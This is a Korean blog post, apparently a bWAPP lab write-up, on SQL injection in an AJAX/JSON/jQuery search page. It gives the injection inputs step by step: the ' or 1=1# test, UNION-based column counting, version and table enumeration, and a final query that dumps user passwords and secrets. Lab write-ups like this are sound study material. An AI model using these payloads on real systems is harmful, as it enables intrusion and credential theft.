SQL Injection (AJAX JSON jQuery)
AJAX(Asynchronous javaScript and XML)는 HTML, 자바스크립트, JSON을 혼합하여 사용하는 기술을 말한다.
JSON(JavaScript Object Notation)은 웹 서버와 데이터를 주고 받을 때 데이터를 표현하는 방법을 뜻하는데,
자바스크립트 형식으로 객체를 표현한다.
JQuery는 자바스크립트 라이브러리 중 하나로, 클라이언트에서 스크립트 언어를 사용할 때 이를 단순화하고
AJAX 기능도 제공 한다.
밑 블로그의 정의를 참고했다.
출처: https://lucete1230-cyberpolice.tistory.com/90 [I-Tstory]
아무 글자를 입력하더라도 결과가 출력되는 것을 확인할 수 있다.
[ 공격 가능 확인 ]
입력 값 : ' or 1=1#
[ 컬럼 수 확인 ]
입력 값 : 0' union select all 1,2,3,4,5,6,7#
[ 버전 확인 ]
입력 값 : 0' union select all 1,@@version,database(),4,5,6,7#
[ 테이블 명 확인하기 ]
입력 값 : 0' UNION SELECT ALL 1, table_name,3,4,5,6,7 from information_schema.tables#
[ user 테이블 컬럼 명 추출 ]
입력 값 : ' UNION SELECT ALL 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='users'#
[ user 테이블의 컬럼 내용 확인 ]
입력 값 : 0' union select all 1, concat(id,login),password,email,secret,6,7 from users#
'Web hacking' 카테고리의 다른 글
| bWAPP 18.SQL Injection (Login Form/Hero) (0) | 2022.02.11 |
|---|---|
| bWAPP 17. SQL Injection (CAPTCHA) (0) | 2022.02.10 |
| bWAPP 15. SQL Injection (POST Select) (0) | 2022.02.07 |
| bWAPP 14. SQL Injection (POST Search) (0) | 2022.02.06 |
| bWAPP 13. SQL Injection (GET/Select) (0) | 2022.02.06 |